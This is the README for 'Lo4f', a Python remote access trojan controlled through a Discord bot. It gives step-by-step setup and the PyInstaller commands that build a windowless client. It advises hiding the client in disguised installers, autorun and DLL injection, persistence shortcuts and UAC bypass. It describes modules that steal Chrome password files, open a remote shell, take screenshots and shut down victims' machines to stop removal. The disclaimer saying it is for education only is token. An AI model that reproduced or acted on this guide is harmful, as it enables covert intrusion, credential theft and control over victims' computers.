Lo4f is a sophistochated RAT (Remote Access Trojan), written entirely in python.
This software is intended solely for educational purposes and authorized security testing. Unauthorized use for malicious activities is strictly prohibited. The author is not responsible for any misuse.
- Click on "Add Server" in Discord.
- Select "Create my own".
- This selection doesn't matter, just select anything you'd like.
- Name this anything you'd like, it doesn't matter.
Your server is now created! Now we will set up your bot to create a control center.
- Go to the discord developer website here
- Select New Application. Name it whatever you'd like, it does not matter.
- Select the "Bot" tab after creating the application. Give it any pfp or banner, it doesn't matter.
- Scroll down and ensure that message content intent is selected "on".
- Navigate to the OAuth2 tab on the left sidebar.
- Scroll down and ensure "bot" is selected.
- Scroll down again and select "Administrator."
- Scroll down once more, ensure the link is set to "Guild Install", then copy the generated URL.
- Enter the generated URL into your web browser, then add your bot to your server.
- Go back to the GitHub link and download discord_bot.py, userclient.py, and requirements.txt. You will need to have Python installed and install the necessary pip libraries. You can install are neccesary libraries by running the command below.
pip install -r requirements.txt
- Navigate back to the Discord developer site and click "Bot".
- Get your token and copy it. Remember to keep it in a safe place.
- Go to the source code of both files and update the Discord token with the token you just copied.
- Navigate to your Discord server, right-click your text channel, and click "Copy ID". You may need to enable developer options in Discord to get this option. Then paste the ID into both files.
For this portion, you will need Python and PyInstaller installed (pip install pyinstaller).
- Open a terminal in the same directory as your files with the replaced Discord token and channel ID.
-
Run the following command:
pyinstaller --onefile --noconsole userclient.py -
Run the following command:
pyinstaller --onefile discord_bot.py
DO NOT USE THIS MALICIOUSLY. USE THIS AS A PENTESTING TOOL OR FOR EDUCATIONAL PURPOSES ONLY.
- The most common method of deployment is embedding
userclient.exein a disguised installer file or poisoned exe file and setting it to autorun on startup. you can also change the exe to a dll and dll inject the disguise program. - You can also create shortcuts that re-launch the executable if the original file is removed.
- Since
userclient.exerequires admin privileges for full functionality, you can apply UAC bypass techniques. Read more here.
When you launch discord_bot.py, you should be met with a welcome message on your server.
Once you have an infected computer, click start service. If there are no infected computers online, clicking the button will set up the server for controlling the pcs, but no channels will actually be created.
However, if an infected computer is online, pressing start service will create a channel for each computer online. in my case, i have infected my own computer to test this.
Navigating to the new channel, we are greeted with several options. I will go over them in detail now.
-Send Popup
This option, when clicked on, will prompt you asking what message to send. after typing in my message to the channel and hitting enter, a popup will appear. it will also notify you when the user dismisses the popup window.
-Steal Passwords
This is a very useful tool that locates the password file for google chrome, and sends it as a message to the discord server. They are still encrypted, but there are numerous decryption tools on github. I will not link one here.
-Execute Commands
This module is by far the most dangerous command. It will open a shell in discord, where you input commands by sending messages. Tread very carefully when using this command as if you don't know what you are doing you can cause SERIOUS damage and also possibly make your identity known to a security buff who's pc might be infected as a sting.
-Screenshot
This command is painfully simple. When clicked, it will take a screenshot of all monitors and send it in the channel. This will later be improved upon by getting a live update or keylogger feature.
-Shutdown
This module just shuts down the users computer. this can be used as an emergency "stop" if you detect them taking removal measures of the malware.
-Commands
!clear - Clean up the interface back to the original state
!menu - Shows context menu with modules. use this if you want to not have to scroll up to execute modules.